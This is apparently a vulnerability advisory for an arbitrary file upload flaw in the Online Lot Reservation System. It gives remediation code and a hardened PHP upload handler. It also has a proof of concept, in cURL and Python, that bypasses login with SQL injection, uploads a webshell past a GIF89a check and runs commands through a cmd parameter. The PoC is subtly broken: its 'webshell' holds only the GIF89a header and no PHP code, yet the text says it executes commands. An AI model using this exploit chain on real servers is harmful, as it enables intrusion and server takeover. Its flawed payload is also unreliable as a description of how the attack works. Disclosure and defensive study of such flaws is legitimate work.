# Vulnerability Summary: Arbitrary File Upload Vulnerability in Online Lot Reservation System V1.0

## Vulnerability Overview

* **Project Name**: Online Lot Reservation System V1.0
* **Vulnerable File**: `edithousepic.php`
* **Vulnerability Type**: Arbitrary File Upload
* **Vulnerability Cause**:
  1. **File type detection is bypassable**: The upload is validated with `getimagesize()` only, which can be satisfied by prefixing the file with the `GIF89a` magic bytes.
  2. **Filename is not renamed**: The original name of the uploaded file (including its `.php` extension) is used directly.
  3. **Fixed but executable directory**: Files are written to the fixed `housing/` directory, which the web server is configured to execute PHP from.
* **Exploitation Conditions**: No valid credentials are required; an administrator session can be obtained through SQL injection in the login form.

## Impact Scope

* Attackers can upload malicious files (e.g., WebShells).
* Arbitrary system commands can be executed remotely.
* May lead to complete compromise of the server.
* May facilitate further penetration into the internal network.

## Remediation Solutions

1. **Strict File Type Validation**:

   ```php
   $allowed_ext = ['jpg', 'jpeg', 'gif', 'png'];
   $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
   if (!in_array($ext, $allowed_ext, true)) {
       die('Extension not allowed');
   }
   ```

2. **Check MIME Type** (detected from the file content, not the client-supplied `Content-Type`):

   ```php
   $finfo = finfo_open(FILEINFO_MIME_TYPE);
   $mime = finfo_file($finfo, $file['tmp_name']);
   finfo_close($finfo);
   if (!in_array($mime, ['image/jpeg', 'image/gif', 'image/png'], true)) {
       die('Invalid file type');
   }
   ```

3. **Rename Uploaded Files** (never reuse the client-supplied name):

   ```php
   $new_filename = uniqid() . '.' . $ext;
   ```

4. **Disable PHP Execution in Upload Directory**: Add a `.htaccess` file to the upload directory or configure Nginx to prohibit PHP execution there.

## Proof of Concept (PoC)

### Attack Steps (cURL)

```bash
# 1. Obtain administrator session via SQL injection
curl -X POST http://127.0.0.1:7777/onlineLot/loginuser.php \
  -d "email=admin' OR '1'='1'-- -&password=test" -c cookies.txt

# 2. Create WebShell (bypass detection using GIF89a header)
echo "GIF89a" > shell.php

# 3. Upload malicious file
curl -X POST "http://127.0.0.1:7777/onlineLot/edithousepic.php?houseid=1" \
  -F "image=@shell.php" -b cookies.txt

# 4. Execute command
curl "http://127.0.0.1:7777/onlineLot/housing/shell.php?cmd=whoami"
```

### Python PoC

```python
#!/usr/bin/env python3
import requests
from urllib.parse import urljoin

url = "http://127.0.0.1:7777"
houseid = "1"
cmd = "system('whoami');"

s = requests.Session()

# 1. SQL Injection to Obtain Cookies
r = s.post(urljoin(url, "onlineLot/loginuser.php"),
           data={"email": "admin' OR '1'='1'-- -", "password": "a"},
           allow_redirects=False)
if r.status_code != 302:
    print("[-] Login failed")
    exit()
print("[+] Login success")

# 2. Upload WebShell (original filename is kept, so it lands as housing/shell.php)
upload_url = urljoin(url, "/onlineLot/edithousepic.php?houseid=" + houseid)
shell = b"GIF89a"
r = s.post(upload_url,
           files={"image": ("shell.php", shell, "image/gif")},
           allow_redirects=False)
if r.status_code != 302:
    print("[-] Upload failed")
    exit()
print("[+] Shell uploaded")

# 3. Execute Commands
shell_url = urljoin(url, "/onlineLot/housing/shell.php")
r = s.get(shell_url, params={"cmd": cmd})
print("[+] Output:")
print(r.text.replace("GIF89a", "").strip())
```
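### Hardened Upload Handler (added example)

The four remediation steps above are combined below into one upload routine. This is an added example written for this page, not code from the Online Lot Reservation System project. It assumes the form field is still named `image`, that images are stored under `housing/`, that the GD extension is available, and that authentication and authorization have already been enforced before this code runs. It goes one step beyond the page's list: instead of moving the client's bytes into place, it re-encodes the decoded image, so a file that is simultaneously a valid image and PHP source (which passes both `finfo` and `getimagesize()`) is never stored byte-for-byte.

```php
<?php
// Added example: hardened replacement for the upload step in edithousepic.php.
// Assumptions (not from the original project): field name "image", target
// directory housing/, GD available, caller already checked the session.
declare(strict_types=1);

const UPLOAD_DIR       = __DIR__ . '/housing/';
const MAX_UPLOAD_BYTES = 2 * 1024 * 1024;

// Allowed extension => MIME type that libmagic must report for the content.
const ALLOWED_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

function store_house_image(array $file): string
{
    // 1. Upload sanity: PHP reported success and the path really is an upload,
    //    not something the request could point elsewhere.
    $err = $file['error'] ?? UPLOAD_ERR_NO_FILE;
    if ($err !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed with error code ' . $err);
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    if ($file['size'] > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('File too large');
    }

    // 2. Extension allow-list on the client-supplied name. Only the last
    //    extension is considered, and the name itself is discarded in step 5.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        throw new RuntimeException('Extension not allowed');
    }

    // 3. Content sniffing with finfo on the bytes, ignoring the client's
    //    Content-Type header entirely; the result must match the extension.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime  = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException("Content type {$mime} does not match .{$ext}");
    }

    // 4. The file must decode as an image with real dimensions. A bare
    //    "GIF89a" prefix followed by PHP source does not survive this.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $mime || $info[0] < 1 || $info[1] < 1) {
        throw new RuntimeException('File is not a valid image');
    }

    // 5. Server-chosen random name; the original filename is never reused.
    //    random_bytes() is preferred over uniqid(), which is time-based.
    $newName = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest    = UPLOAD_DIR . $newName;

    // 6. Re-encode through GD so the stored bytes are produced by the server.
    //    Any PHP text appended to or embedded in the original is dropped.
    //    (Trade-off: GIF animation and some metadata are lost.)
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('Image could not be decoded');
    }
    $written = match ($ext) {
        'jpg', 'jpeg' => imagejpeg($img, $dest, 90),
        'png'         => imagepng($img, $dest),
        'gif'         => imagegif($img, $dest),
    };
    imagedestroy($img);
    if (!$written) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0644); // readable by the web server, never executable

    return $newName;
}

// Usage inside the upload endpoint:
try {
    $stored = store_house_image($_FILES['image'] ?? []);
    // Persist $stored in the house record instead of the client's filename.
    echo 'Stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'Upload rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
}
```

Steps 2 to 4 are input validation and, on their own, can still be satisfied by a well-formed image that also contains PHP source; step 6 removes that residual risk, and step 4 of the remediation list is the control that matters even if every check above is wrong. For Apache with `mod_php` and `AllowOverride` enabled, a `housing/.htaccess` containing `php_flag engine off` plus a `<FilesMatch "\.(php|phtml|phar)$"> Require all denied </FilesMatch>` block stops execution; for Nginx, a regex location such as `location ~* ^/onlineLot/housing/.*\.(php|phtml|phar)$ { return 403; }` placed before the generic PHP handler location achieves the same. Both are assumed deployment layouts, so adjust the paths to the actual install.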